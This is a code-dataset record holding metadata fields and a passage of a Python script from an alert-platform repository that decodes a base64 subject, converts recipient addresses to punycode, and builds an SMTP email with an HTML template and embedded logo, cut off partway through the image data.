| 0.000386
| 0
| 1
| 0.01494
| false
| 0.001446
| 0.008193
| 0
| 0.063133
| 0.000964
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91e1a32174e4a9edbde9d069cccca2f30ff0366e
| 20,131
|
py
|
Python
|
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#@author: PI
import sys
import base64
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email import encoders
import idna
def base64_decode(param):
param = bytes(param, encoding="utf-8")
param = base64.b64decode(param).decode("utf-8")
return param
def punycode_converter(param):
param = param.split("@")
return idna.encode(param[0]).decode("utf-8") + "@" + idna.encode(param[1]).decode("utf-8")
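# Example (hypothetical address): punycode_converter("user@bücher.example")
# returns "user@xn--bcher-kva.example"; pure-ASCII labels pass through unchanged.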
def send_email(to, subject, body):
# This function supports SMTPUTF8 (the recipient's address may contain UTF-8 characters); note that the SMTP server must also support SMTPUTF8 for this to work.
user = "example@example.com"
email_password = "blahblah"
smtp_server = "SMTP.locahost"
smtp_port = 587
msg = MIMEMultipart()
msg['From'] = user
msg['Subject'] = base64_decode(subject)
default_body_head = '<div style="width:78.7%;margin:auto;font-size:14px;font-family:Times New Roman,Times,STFangsong,Microsoft YaHei,黑体,宋体"><div style="padding:28px 12px;display:block;height:auto;text-align:justify;background:#f9f5a9;color:#1082a5;width:100%;border:3px solid #898989;-webkit-border-radius:22px;-moz-border-radius:22px;border-radius:22px;-webkit-box-shadow:0 0 20px rgba(0,0,0,.32);-moz-box-shadow:0 0 20px rgba(0,0,0,.32);box-shadow:0 0 20px rgba(0,0,0,.32)"><!--This system is designed by Mike in Beiing. Copyright 2019 Mike. All rights reserved.--><a href="https://github.com/Pi-314159265" target="_blank"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEACAYAAABccqhmAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAABmJLR0QA/wD/AP+gvaeTAAAv3klEQVR42u2de5QcxX3vP9Xd0z2zq5Vmd7WSdlcCjLRagS20gEBIQoIgEA+xAgxCq9UDG4hEpDg4mFzHTmLn4cQkJze2TxInThzbudeBQF4+9o2vHYPBBOPgC45jY4enDTYyBrEChF77mK77R3XP9My+5t3dM/U5Z8/s7ryqZvr3rV/96le/Ao1Go9FoNBqNRqPRaDQajUaj0Wg0Go1Go9FoNBqNRqPRaDTxRYTdAE3pjCxeBmAACe9fNnAm4AQeZgC/ACwE3CJf2gBeAR4seM4o8ENgzPt7HHA7X3ou7I9CUyFaACKOZ+xzgHYgBawDksAClIEbKMM/EyUEQRLe/aXgogw8yBhKAEa9+x8EXgVOAo8CJ4DXgaNaFOKFFoCI4Bm6iTLifpTBXwx0AacCK737F3q3USCD8hgywPeBF4FDwEMoQXgaJR4ZLQzRRAtASAQMfgHQBlwArALWoARgLmBR+ggeNi4wARxBCcBjwLPAk8BzKIHQghARtADUCc/gBcpd7weWAVcBF6IEYAHRGdlrweso438E+DJKDJ5GTSukFoRw0AJQYzzDb0UZ/CXAFcA5wDxyQbxmYxx4E/gO8BXg6yhBOKaFoL5oAagyBSP9ClSgbjNwLjAf/ZkXIoHXgCeAf0MFGJ9CewZ1QV+MVWKGkb6D+M3jw8IFDqM9g7qhBaACAqN9L3A+8C5UME+P9JXjewb/AXwO+DZwEO0VVBV9kZaBZ/g2sBq4FNgO9NG8c/paM45aSbgXuB94HBjTQlA5WgBKwDP8BHAe8IvAINAZdruajBHgS8Bfo+IGY2ivoGy0ABSBZ/idwCbU0t0gam6vCY8RVKzgHuCLwIgWgdLRAjANntGDMvStqBF/NZPTbTXhMoaaEvw1SggOA2gxKA4tAFMQGPEHUYZ/Hnp+H3XGgf+HEoIvoT2CotACEMAzfAu4FvhVGnXEl1Ldiob8+n2P4GPAF4AJLQTT05BXQKkURPV/ESUA6bDbVROkRLS2IlIp3JGRsFtTS95ACcBfo1cNpqWpBSCwjt8D/BKwH7ULr3ExDFp+57dInHcuRw+8l8wzz4LZyFsQeB34JPAXwM/QKwZ5NG2Gmmf8LcBu1NryB2h048+42FduxnnnNZhvP4PkgX2I1tbclKAxaUd9t/ejvuuWQIC36Wk6DyBQTWc56sK4ASUEjY2UiPY0bZ/5FNZ556p/nTjB0V+6nfF/u7/RvQCfY6haBR9FFTJpem+gqTwAz/gnjQhht6suuC72ZZuwzl6V/ZdIpUjuHGoGL8CnFdgC3Ad8EGhvdm+gKTyAQPGNNcBvoyrtNM+ynuti9i1jzt/8BebS0/PvGxvn+O/fxclPfw6MphoPxlHewG+jipY0ZZGShv/GA2v6d6KiwpfRTMYPYBg422+YbPwAdgJneDvG4l5wi60d2hAkUNfCF1DXRmczegMNKwAji5f5xt8PfAI17+sKu111x3Uxz+jH3rpl2oeY/ctJHbgNEs2lix5dqGvjE0B/4LppChpSALwvMAnchEoP3UmTTHfykBLR0kLqfe/F6O2Z8aH24FVYA2dBJhN2q8NAoK6RL6KumWSziEBDCUBAvVuA9wOfQkX7mxNXkth4IYmN62d9qGhP4+wcglSqWQKCU7Ecdc18COhpBm+goQTAow+4G/h18g/KaC5cF2NJL6k7b0ekUkU9xbnmapytW5otFjDpY0BdO/egrqWGpiEEwFNqE1gLfBq4BjUFaF6kxB7cgrmiv/jn2DbOziHEgq5m9gJATQk2okTghpHFy0SjegKxF4BAOu8wag63Mew2hY637OcM3VDyhh9r9Tmk9t7cqBuFSuVc1JRgF9CQIhBrAQgs8X0UtftrfthtigQJi+SBfZjLlpb1dPuaQcy+Zc0aECykA3VtfZQGXCqMrQAEjP9jwP9Al+ZSuC6JdWuxN19a9ksYvT04u4bAad4QSgGdqGvsYzSYCMTOzwt8+P3Ab6Fc/9j1oyZIiUinafvcp7BWn1vZSzXfPoFikMDngTtQFYtjX3koVh5AwPgvopnX96cjk8HevAnr7IGKX0qkUiR3DSFaWpo9IBhkUqwp7t5AbAQg8EFvQBV5aN71/alwXYy3nYZz066qjdjW+rXYg1dpAcgnuNq0AeItArEQgMAHvBH4G5pgfbZkhCC5ZyfWqpXVe8lUiuT+vRg93c2eGzAVfahrMdaeQOQFoGDk/zTa+CeTyWD2LZsx379czGVLcXYPN+s+gdnoI+aeQKQFQI/8ReDV+MuO1NVGCJJ7hlUdAb0sOBWx9gQiKwB65C+STAZr/QXYV19Zs7cQ6TTOjhu1FzA9sfUEIikAeuQvEldi9PaQ2r+v6Hz/crGv2Ix95WbI6FjANMTSE4ikAHisR4/8syCxr92Kdf7qmr+TmNtG8pZ3ITrSelVgemLnCUROAAIZfr+JNv7pcV2Mxb04266r21taZ68iuWen3icwM33AnwGnhN2QYoiUAHjG7+deXx52eyJNIkHqwG2Y/XVMh7AsnF07MPuW6mXBmVkJfAToiLoXEBkBCIz8H8fbfRV2myJLJoM1sEol6dQZo6cbZ9v1zVZAtFQE6hr+OBHfOxCJbzHwAd2KNv6ZkRLR0UHqjl9BtKdDaYIztI3ExRv1suDM+CJwK0Q3HhC6AAT28+9G7bjSxj8Trou9eROJdWtCa4JoT5Pcs7OZzhMoF4G6pncT0XoCoQpA4AO5HDXv7wj7A4k0UiIWdOEMbwfLCrUp1o
VrSWy8EFwtALOQF9OKmgiE7gGgoqa/id7PPztCkNp7M9bqc8JuCSKVInXn7c14nkA5RHZVKzQB8JTQQR3RNHvZ2mbHz/e/ZjDslmQxV/RjXzeolwWLYz3qWnei5AWEIgAB4/8AsCPsDyEWOA7OrqFZ6/vXFSFI7r1FeSQ6IFgMO1DXfGREoO4CEOj4FcCv0cylu4tlYoLERRtUPn7EMDo7VEzC1vsEisBBXfNXQDTiAWFNAU4BfpdmOZm3EqREzO8kedOumuf7l4u9+VIS69bqWEBxtKCu/UhkCtZVADzFS6OypKpXuaKRcaW37r4h7JZMi0jPI3XHe1Regl4WLAY/UzAdthdQNwEIdHSH96MjR7Phuhi93Tg3Xh/5QJs1MIC99eqwmxEXBDk7CHUqUBcBCHTwLNSxS+EuYseFRAJn93DZ9f3rimWSOrAPc3mfngoUh4WyhbMgPBGo5xQgUnOfyDMxgTVwFsk9w5Ef/X2M3h7lrWiKJfRYWM0FoCDPv3ZlaxoJr75/8tZ3I9LpsFtTEva1g1hrztNeQPFcSYj7BerlAawGbgfsuvcwjrgu9pVeBZ6YYSxaSGr/XkSrPk+gSGyUbdS+qssU1FQAPEWzgP3A6WF0MHZIiehoV2v+MT2Rx1q/FmvdBTo5qHhOR20amldvL6AeHsB1wDvr2qs449f3P3tV2C0pvwupFKn9+1TWot4sVCyh2EnNBCBQ3ed2YF69OxZLXBezbynOrh2h7/arFOv81djXDoLUsYAisYBbqHMVoZoIQKADW4Hz69abuGMYONuur019/xBI7tbnCZTI+cAvUcfaAbWcAqxArXPqJPFiyGRIXLwRZ2hb2C2pGsapp6izCm0d+y2SBLAPOKNeb1h1AQhU+LkZdYS3Zjb803327AytzFetsC/bhDWgvYASWIIKCLbUwwuoqgAEGrwS2F7z1jcKUuIM30jioujm+5eLaE+r+oUdHXpZsHi2AZdA7XMDajEF0Bl/peC6GL29Db2lNrFuDfbmTTo5qHhagL3UIUOwFgKwCbis1g1vGITAvm5Q5dA3KpZFUu8TKJVN3k9NqZoAeK5K3ZSrIchksFafQ3LvLbHJ9y8Xc+npONtv0OcJFE/Wlmo5DajKtxFo4CXej2Y2pIRUCmfnEEZncxRDtrduwTyjX3sBxZO1p1qJQDXlWI/+peC6OFu34FzTPHvojd4eUu97L6JF7xMokprbVDUFYAC4uLafR4Pg5/vv3N50a+SJjeux1q/Vy4LFU9NYQMUCEFj3vxZoq9enEnfsrVdjDQyE3Yy6I1IpVd9wfqf2AoqjBWVbNckOrJYH8Hb0un9xuC7m8j5SB/aBFc/dfpWSuHgDzvZtOhZQPJeibKzqVCQAAUW6Cb3uXzTOjddHq75/vRECZ+gGzL5lWgSK4xSUjVU9GFgND6AfiF7B+ijiulhrzlO75Jocc9lSkgf2QaIxk59qwI3UILW+GgKwHlhc948jbkjp7ZPfi7FoYditiQT25k1YA2fBxETYTYkDi6nBEXplC0Cgxv+7K3mdpkFK7MGrVARcA5Bf91AHBGfDQNlaVc8SqNRw3+H9aGbCdTF6e0ju3xvZ033CIlv7UC8LFkPV7a0sAfAUKKtIYX8qkUdKlQXXF/5ZcJHDNHFu2oXxttN0QHB20nged7W8gEo8gJrMSRqOTAbr7FUkdw+H3ZLIYq1aSXLPzobfD1Elqhpzq0QAzgNicGRNyCQSaoQ7Va+SzkTWQ9JTgdlYirK9qlCyAAQy/65CH/E1Mxmvvv8V8avvX2+Mnm4VI2lt1QHBmbFQtleVzMByPYBeoPHK11QTKRGd7SRveRdirs6QLgb76ivVKomOBcxG1TIDyxWAdcBpYX8KkcZ1VT28GNf3rzcilSK5c0h7AbNzCl7RnUq9gJIEIBD9vxxd7Xd6vHz/5IF9sa/vX28SF23AGb5RC8DsXAE4lb5IOR6Ajv7PhmHgbL8Bc6k+Da1k7ATO8HaMxb16KjAz51CF8uHlCICO/s+E62Ke0Y+9dUvYLYktZv9yUgdu0/sEZiZNFeywaAHQ0f8ikBLR0kLqfe9t7t1+VcAevErtE9DLgtNRldWAUj2ARcCFYfc8sriSxMYLSWzUM6RKEe1pnJ1DkErpeMD0XIiyybIpVQCWAgvC7nUkcV2MJb2k7rw99Hx/6RmMnMFwinkMgPR+pnt+LXGuuRpn6xYdC5ieBVQ4DShKAAqq/qbD7nUkkRJ7cAvmivBPQxNeSq2YIrVWSomUktw9+Y+R5Bu3yD0x+/zpXrvq2DbOziHEgi7tBUxNmgqrBpfiATjAL4Td40jiuph9y3CGbohUPrsM/gQMN2u8UoIIGHzWyETudyknuwB1NEZr9Tmk9t4cqc81YvwCFSwHliIAbejRf2oS3sk3y8JfHPFHeKRE+EYvZdbopZS4vk0LgSAwmmdvUY+RMvuYrDQIAULk3qcO2NcM6n0C03M6FSTllSIAK9Cn/U7GdUmsW4u9+dKwW5JFCJGbu3tGnDVYITCU1efN7wsNWtm5/xhPQKTEldJ7SVGfaQDqPAFn1xA4Fee9NCILvZ+yKEUAzgd0NYsgUiLa20nd8R5Eel7YrQGCc3NReAcyk8EdGWH0mWc5/l/fY/S/n8J9+RXk6FjWoIX3zGwcwf/dEwdDCCQ5L6NeODu805O1F1CIA6wu98mzrucH1v9Xht3TyJHJqLp2Zw+E3ZI8/FHb8EfwsTGO/+CHHPraA7zx+Hfg4EE4eRKRSEBXF3NWnUXXpktoO/9caGlRI39BsM8PGwqUCKh/1k8ARCpFctcQE488ijx5UscE8lmJygeQnS89V9ITi03oWYTaAKTxcV2Mt52Gc9MuMKNT3983Sd9IJ0YO8/L//jsO3fcPiJ++hOm6mAHjkT/9KUf/87u88aUvk95yOb233kzy9LdlRcCVSkgQnk/hTSOAuhuhtX4t9uBVjN73T1oA8lmHstGXS31isVOANvSpP/kIQXLPTqxVEXOMAqPy+Cuv8vxH/4hX/vTPsV/8CbaUWIaRc/eFwDRMLAGpkUO89fl7eO6DH+L4D59S0xtyQiKmfKv6Ls2JVIrk/r0YPd06NyCfsu2zWAHwFUYDkMlg9i2LZL6/P4+XJ07y4qc/w1v//C8kR0cRhjEpqUfN96X/RGzpMvHIN3nh43/KxKuHkELgFhp5YOStVxAwiLlsKc7uYb1PIJ+yPfRiBSDF1INA8yElorU1NxJFDN9cjzz+BIf/8Z9xRkfVKJ6X/JN7rBv4XQI2ktGvP8jIV7+G8Nz/4Ehf71F/EkKQ3DOs6izogKCPoMwA/YwCENj/X3aUseHIZLDWX4B99ZVht2RKBMDEBCOPPID12iFMQ33FwXV/34RN7/Fm4LlCCMwTx3nl/gdw3zyi/l8w6ktvKTC0PqbTODtu1F5APqspo1pwMR5AAtD1rAFcqc64378v9Hz/qfBtcuLYMY49/Qym63rr9rnRP2i3/vjpknPvXCAhBPz4RcYPvVbwBt7KwKRXqj/2Ff55AjoW4LGMMor0FCMAbcDcsHsXDST2tVuxz
o+mQ+Rn/rnj42TeGkfkTfinNltB7iIwvL9dQI6Nkhkfzz7OlRLpTwe8bMBQ+zq3TdVb7EjrfQKK0ygjI7AYAdAZgKCW/Rb34my7LuyWTI9nlGYyiTNvnprfC4EMxAB8lz844rteKDCDf0EImNNGosXzcrxYQJ7JR8DorLNX6fMEcpSVEViMABhFPq6xSSRIHbgNs3952C2ZFj+QZ7a0kFi0ULn+nuFLIbKu/uQtvvkBQldK3PmdGHO97EYh8uzdTwUOXQQsC2fXDsy+pXpZsEyKMeyy5hYNRSaDNbAKe/CqsFsyI1kjNgxaenvJJGwkgfReKScZf6G6Z1BZhM7CBZBKKhuXEuGl/6r8Af8Nwx95jZ5unG3Xg9H0Y1RZsbpiPrXVRT6uMZES0dFB6o5fQbSnw27NrPhxALunmwk7oXb2+v0odOPJXwrMfslC0La4F9Oxs39TsPlnukIhYeAMbSNx8cZmXxYsa7WueQ27WFwXe/MmEuvWhN2S4vAz9xYuxE2l1JKdd1fhbfD34IXgmhaJRd1gGHmDfN4GoDpvBpqxy+1pknt26vMEymBaAQisJ0Yn0b3eSIlY0IUzvD029f39RJ1kVyfOvHlZt5/A6D+VF5BBeQIGAlItpBZ0Ze8LbgGWwZyAsDsbwLpwLYmNF6pCBs1LJ5AoJRdgNg+gC4jJ0FcDhCC192as1eeE3ZLi8QWgoxO7Pa0283ijtZ8TMGVX/VvpkpnTSqJ7Ufb1hLcZyJ9KyOz/oiMBIpUideftzX6ewBpKXAmYTQCSQEfYvQoFP9//msGwW1ISwg+GtbZidXUhixinVS6At3tQSkjPy8Y7snEDb9Jfz0IgpWKu6Me+bjBSwlRn/FSOkp6gmQrHwdk1FLv6/n5wzrAstRIQ2AQ03aht4FX9AZCSlu5F2G1teTUFp9kOGHZ38xGC5N5blMfW3AHBotECMBUTE+qMuh03ht2SkvHX/YVlwuIeJkzvK55iW6//5QdKgQJgd3VhzmlVOQOB2oL+A4KlxqKG0dmhYjZ2c69cF8tsApCi2U4BkhIxv5PkTbsime8/K4EEHbunB8O2c4U8AisCPv4F4M+aM6aF3b1IbbQpKAbiC4L/PhEb/7PYmy8lsa4pjxlvA04t5QmzCUDz1QFwpbeuvCHslpSFH/EHmLNoIVZLS260LsgDcMlfz5dAJmGT6u3N/idv+48kL5cgeuO/1670PFWnsT0dvWlKbUlTYum+YjyAqH7P1cd1MXq7cW68PpLu7WwUHuqRmD8fMWcOrgxsFMrb0VcgAFKScWyEV+dAitzloV43t4oQel2AWbAGBrC3Xh12MyKPjgEESSRwdg9Hor5/OfglvPzkn8TcNhILFuAK8iv+kq/qJrlkD2tuG3ZnZ/a+wgNF/D0AUV0JyGKZpA7sw1ze14xTgaLRAuAzMYE1cBbJPcOxHP2D+MZpplpg0UK1uYfc9MBP//WNPjsVkBIrPY/kfCUAKqCYO1BE3Ybdu+IxenuUN6eZFi0AoEa0dJrkre9GpNNht6a8LhT8LaQEJ6HKlhlG3ojvPzZYDsz1frHmd2HOmxc4Ccg3fn/kJ3vQSBywrx3EWnOe9gKmQQsAqHz/K70KM42CECAM2np7EJaVt9QXnP8H87wnDINUTzdGIrfwk40ZCPI9o5h4ScaihaT270W0tsTLfakTWgCkRHS0qzX/CNX3L5W8fXr+he5tC8ZKTBnJFQhc7x4TmDBMjN5eMC3134KzA/1zBQPvFAus9Wux1l2gk4OmQAuAX9//7FVht6RaHcrbsJOYPx/mzJly9FNy560OACJhYfX2oA4PZFKwL5gLIGI0mopUitT+fSqrs7k3C02iuQUgk1F15nftiM1uv9koPOQz2dEO7fPITLERKOOt8wvAkBIzlSS1KLeXZNKp4NnjgZQdxWMSoLDOX4197SBIHQsI0rwCEPH6/uUiRP6Xasybh9vZmX8KsP87gRJhEszWOSQXLsg+ruADQ4hcJCG6eYDTk9ytzxMopHkFwHXVWXMRre9fPiKvhp9IJnEWLcy571ME7wSCDGB2tGPOVQWg/TV/KSWZjOu9nh8TCOw6jBHGqaeosxxtO+ymRIb4fYvVwB/9dw7FM99/pq7hu+5qpDcch7bFiycVBcl/vMRFYi5aRKK1Ne9+IQSGEd0twKViX7YJa0B7AT5NKwDOsHfefIORXebzDdY0sLu7kZZVcLBH/pKgKwRu9yJEKul9RAEXPwoVgKv1+bSnVX3Hjo6G6VMlzCYALwLHw25kVXFdjN7eht0yms3Yc92scacWLsQtGNmBvI0+mCYtvT2qum6g3l82qFhQEFTdF3ZvyyOxbg325k2NmBx0HGWzRTObAHwfGAm7V1VFCOzrBlWOeAPiu+pBl91etIDxlpa8x+VqAXgyYJrM6VVZgyqSaGSLiBh++nB+WYC45AJNxrJINuY+gRGUzRZNc00BMhms1eeQ3HtLjK/e2XELTgI22tsx0/PyzgiEQCkwKSHVQmLhDDu/vbMBsu8Rc8Mxl56Os/2Gpj9PoHl6LyWkUjg7hzA6G7jMYSB5x3fRrbltJLu68pYA/Q1Arh8sbG/PbgLKCkVeAREVMfCnGEYDCKi9dQvmGf2N5gWURPMIgOvibN2Cc01j7xHPru17J/j4R4UlFy7M3ueT3RMgJZmOdsx56iiw3PRhcvAve18DCIDR20Pqfe9FtDTvPoHZBOAkcDjsRlaMn++/c3vDrwELb76e3ccvJcK2SXZ34xr5ex0MVDqwBMyFCxAtqYLDQ2TefN+3+UYylcTG9Y10nsBhlM0WzWwCcAh4LOxeVQN769VYAwNhN6M+BA7vlJ7lJnt7yNh23vJeriSYoLWnG8NxspmB4G3+IbcSUGgiritjLwbZ8wSWNMR5Ao+hbLZophWAzpee83+Nd8ZEJoO5vI/UgX1gxXe3X7Go4Jw/fmd/xehexLhjT6oL4ILaNdjdA5ZaFs1WDRJGdjdg3rmC3jJhYWWhuGKu6Mce3NII04AM5NnurBQTA4h3HkBM6/uXi2EYufJfgZN8E11dWG1t2ZE8e6lLiUylVCVgATKwWUaI/DiBf5s9IsxoBPNXHXWGbsDsWxZ3L6BkWy1GAO4HxsLuWVlkMrGt718uha66P6glOzuw016Qj/yRO9PSoo4DBxDBS0IGKgOJvOQgIYs5cyg+mMuWkjywT5VDjydjKFstiWI9gPj5RlIiWlpI7mq8fP+iuu/d+mv31ty5JObPx3ULTvWVEjm3DaNrfvZv1yv84ZcBV//OLwbSCKsAhdibN2ENnAUTE2E3pRwkZXgAxWyCPwK8BThh97C0j0NiD16FtX5t2C2pe7+Du/78cn6GY2MtXszrLSkSQqgNvQLIuJi9PZhz2wBv2iClOiosYPzB6USj4teFPPb0s8i33oqbyLnkyjwWTTEC8DTwFHBh2D0s/qNwMXp7SO7f23yjv5fCq5J4BMLwfADLonf3MB3rLiCwrR8pJYlFC0nMSxf18sEy4YV5BY2AfeVmxr/+EKP33Be3IjG+nZZEMT10gXj5RFKqLK++4s9J
bwQkBM7xy5X1AsAwaF35DlpXviPnFkxhvf7GH0HuQKGgoReWCGs4TBPnpl2M/8e3cV/8SZxShd9AeeolUUzvRoEHw+5d0WQyWGevIrl7OOyW1B/PYmXAdZeBwh75VX4k0s2tCEiZvzLgPwamSfuVshGWzabEWrWS5J6dcZsCPIiy1ZKYUQAC64klJReESiKBc9MujFNPCbsldSe7E5DAvB2vtLfIFfWQCFUE1BCTjgYOni0YjAH4t+pHPV7Gy0BKIutBxqdwyCEoLQcAit8LEI+6ABmvvv8VDVTfv2xEdpQ2CioBqSV8kf09eFyYAZNG9zy33w8GxqwoaKkYPd0qhtTaGgdPp+Q6ANl+Fvm46NcFkBLR2U7ylnchvIh2M+LnAWRP8Al8PgDyxElOvvgT3vze9zn+3PO4x44VPD8X4MuWDHdltjaAdN1snCAupwOVi331lVjrY3GeQMl1AHyKDXO+hVKYJWH3dFpcV9V7a5j6/uXhrwAUuvFIyZHvfJef//19HP/OfzJ+5E2slhZSK1aw4IZ30r5xA8Kxs8O6eponBF5EUCK8ikH+uzWyD5A7TyDz5A9xX34lypmPL1JGABDyT4aakj86cpj3z+04CZwLnB92T6fEdTGX99HykQ9jzO+s/PViTDZvP3ioh+vy+kMP8/xvfpjxbzyM/doIiaNHMQ8fZvyZ5zj86H8gWltoe/uZCNPMxg8guC/Ad/1zy4AQg1OCK8To7cF99TUmHn8iykHBLwH/XOr8H0qrB/AgUV0ONAyc7TdgLj097JZEhmCi7skXXuSFj30C65lnsIXKDRBe2S/LEDivvsLP/vwvefPbj2dH9+COQHUbKBQq4ngqQPk4267DWBzZ3YITVLBKV4oAPI9aa4wWmQyJizfiDG0LuyWRwA1E6f3R+vWHH8F98geY3pq2v/TnB/2EYWC8/DKv/uv/hbGxvPLhwttOrG4mewXNgNm/nNSB26K6T2AceKXcJ5ciAGVlGtUUv77/np2I9nTYrYkE2YM7vDiAOzbGkf/+b8yxsVwgcIrnWVIy/tTTTBw9OuXMPhjwk94qQTN5AfbgVWqfQPQCghXZZSkCUJHS1ARXkth4IdaFTZbvPxNeVk+2KpCUZAIXbeHx4HkLhBPj4LqB5CBZMOfPLwnWHOO/1932NM7OIUilorYsWJFnXooATABfJio7A10XY0kvqTtvb758/xkQhsgm/QghMGybOUuWkPHKfQdnsQYC1/s6MwiMJUuwWlqUYbs5byGbKSj9ZcbGXwKcCueaq3G2bolSLECibLLs2FxRAhCILj4C/DzsXquuS+zBLZgr+sNuSSTJBu+EoH3DetwlS5Cum/eF+xWBkZJMWxsdl14CLZ6YBo4Dk9nSQtI7J6B55v952DbOziHEgq6oeAE/R9lkyRmAPqXudHgV5XKEi+ti9i3DGbohykszoVCY8y+AOSvfwaJ338TJ9jQZ11VTBH8e77qcdBzmbnsnnZsumXQCkICswRcafTN6Adbqc0jtvTkq193zKJssm6KL5AXyAU4DLgq125ZJy2+8n8SG9aE2I4pkDVXm/sY0aTujn0TXAo6+NsLx48dxpWQimYRTT6Vr9y4W770Fq6MdCGz5VS+QlxcQ3A7clF4AYPT0MP6NR5CHDoW9W/BzwFfKHf2hxFSukcXLAC4GvkJYBUJcl8RFG5jzyU8gvBJXmhzZmn0Bo3W9/QDSdRk9+DOOP/U08tBriLltJPuX03LaqchEAinBwKsk7G8F9gKKRoEA+DSrCJz8zN9y/PfuCrN60ChwBfBQJQJQTsWD572fM+veZSkR7e2k7niPNv5pKIzWS9/4vWXB5JLFJJcsznuOBITrIgwD6crcyO+9TrZUuMx5Bc2Os+NGxh/+JuNf/VpYhUNeAH5U6YuU47/8FLg3jB6Tyai6bWcPhPL2scJfpw8IQnC0lrmwvvo7sLznZxGK4GgvVRAwr6JwEyNSKZI37ULM7wwrIPhN4KVKX6QkAQi4Gl+n3lmBrovxttNwbtoFZuPX968E/7APCMzxAnv6XX964Gf5kZ/ll6WgJmB2eTHsDkaExMUbVAZq/U8VGge+CriVuP9Q/tmAT3o/dSW5ZyfWqpX1fttYIb1Fe0H+aT55BX2zj1Vi4Cf95G0lZvKKQnakCxYGaWaEwLnxeoze7nrnBrwAPFqNFypZADzFeQPlBdQH18Vacx72tYN1e8u4ks3ZF0Ll+UP2xGA/th+ME+Tv9suVD8u93hTLf4H3anbMZUtxdg/Xe5/AvwMHq/FClaxhfJUy9yCXhJSI1hZS+/diLFpY87drBLKn//hGn1fI0yvyUZDim33eNDn+flkx/znNGv2fhBAk9wyrOhT12SdwHPgCICt1/6EyAfg+ZVYhKYlMBmvdBc1X379MssbvupPy/oEpK/kUru37qwaTpg1N7/NPjUin1elT9fECvgs8VK0Xq0QA3sJTopp11ZXqDPf9+3S+f5H4BmzMMEKLWe73HlRQCzDsnkUb+4rN2FduhkxNYwESZXNV87zLEoCA6/EFqjQXma6/9rVbsc5fXbu3aFQKLHamk3yncucnP167/TMh5rapepQd6Vp6SgdRNld27n8hleYxvkAZBxIWhetiLO7F2XZdTV5eo6k21tmran2ewP0om6saZQuAp0DjwD2UcSDBrCQSpA7chtm/vOovrdHUBMvC2bUDs29pLZYFR1G2Nl6t0R8q9wAAngAer2pXMxmsgVXYg1dV9WU1mlpj9HTjbLu+FpuEHkfZWnXbW4XXGAE+jfIGKkdKREcHqTt+RZf50sQSZ2gbiYs3VnNZcBxlY1U/m6MiAQi4Il8Evl2VFrku9uZNJNatqXZfNZq6INrTqk5l9U4V+jbKxqoW/POp2APwGnQYeKDi1kiJWNCFM7w9bkczazR5JC7agDN8Y7UE4AHgcLWNH6ozBfC5F7VTsHyEILX3ZqzV51S9oxpNXbETOMPbMXorPk+gprtvqykAP6yooa6LeUY/9jU631/TGJjL+7CvG6x0WfBelG3VhKotWHrVgt4B/CtQ2tncUiJSKVr/7GPYl19aq75qNBUxmpF867VxnhgZxxSC8zstVs9PYM9wZqA7cpijt9zGxLcfL2cb+0+ALcCTtXD/obyKQDPxA5Ri/VpJz8pksNavJbFR1/jTRIsTGcmRccmRMZe/evYEn33+JCMnlUu/ICW4fUULd5zRQtKa2pk2Ojtwhrcz8d3/KidN+F6UTdWMqk0BPIWSqEKFxccCpETM71TVVXS+vyZCHJ+QjJzI0GbBV382yp8+dZyRky62CbYJr52U3PXkMf7X8yd47q0JjoxPHfCzN19KYt3aUmMBP0XZUlV2/U1HLUqalhYLcKW3brqhZp3UaEpFAkfGXeYnDSSCLx8cYzQDwoCFKZMlrSYtluCtCXj/d49x6dde58Bjb3Lw+OS1f5Gep+pYtqdLWRWo6dzfp6oCEFCqv6CY7EDXxejtxrnxer3dTBMpfDs9NCp58OdjPPuWMmw5McHB14/y48PHOHZyFKTkjTHJi0dd7vnxKDd9802
+9NJJJgrKhFkDA9hbry727X8C/C1Uf92/kKp7AF6DfwR8ktmOLEokcHYPYy5bWtNOajTl8JWDY1zz0Bvs/uab/OhoRlVZ+tG3MJ/7Q1a9/Huc+YM/hhNveWWYIAM88PI4v/itI/zrSyfzX8wySR3Yh7m8b7apwARwF3UquVfLUw2+CDw2fTcnsAbOIrlnWI/+msjx1JEJ/uDJY/znyARvjElV91OANfJjbPEop815iJPP/zuMnsh/ooBXTkg+8+wJjo/nG7rR26O83Zl5DLgPaj/6Q20FYAT4HVSWYD5SItJpkre+G5FO17yTGk2pPDEy7o36gX9KycS4JHNkMROHjiNmSPX/+YkJjo9PdoDtawex1pw3nRcwSo1y/qejJgIQUK6H8HKY83Bd7Cu9CioaTQSZYwkS/okoUuaOSV58Jm7mAp47Mog4Yws4LQVHKKvbU1oNWq3Jnq2xaCGp/XvVitfkgOA93k9dRn+oYiLQVHjJQf2oKiYrAG/0n0fbZ/8K67xz69JJjaZUXj7h8suPvcn3Xh9HrQMIdSyK6+JK7yAVAQIja0UCyLiStC346EArm5e0Tvna8sQJjn/ww4ze90/BbcOHgGuBR+tl/FD9RKCpeBr4DPCHqLpSqr7/2avq1kmNplS6UwafWtPGm2Muhn9GolQus+tl/vnHqAkh1PmLhkBKsA3oaZ3etEQqRXL/Xsa/+S3cgz8Dw5DA/6RKtf5LoebRN88L6AQ+j+teYS7vo+3uz2F0L6p3XzWaSHH8I3dx8pN/Bab5FWAXMFLP0R/q4AF0vvQcI4uXjQB/AKxEyl73NS/GoctMa5oVIWB0DBAHUbZRd+OHOngAkPUCBPBB4MNGZ0cCJ5zTxTWaSCAl7sjIOKNjv4MQf0CNU36no24L8J4IdAB/j5SX6dFf0/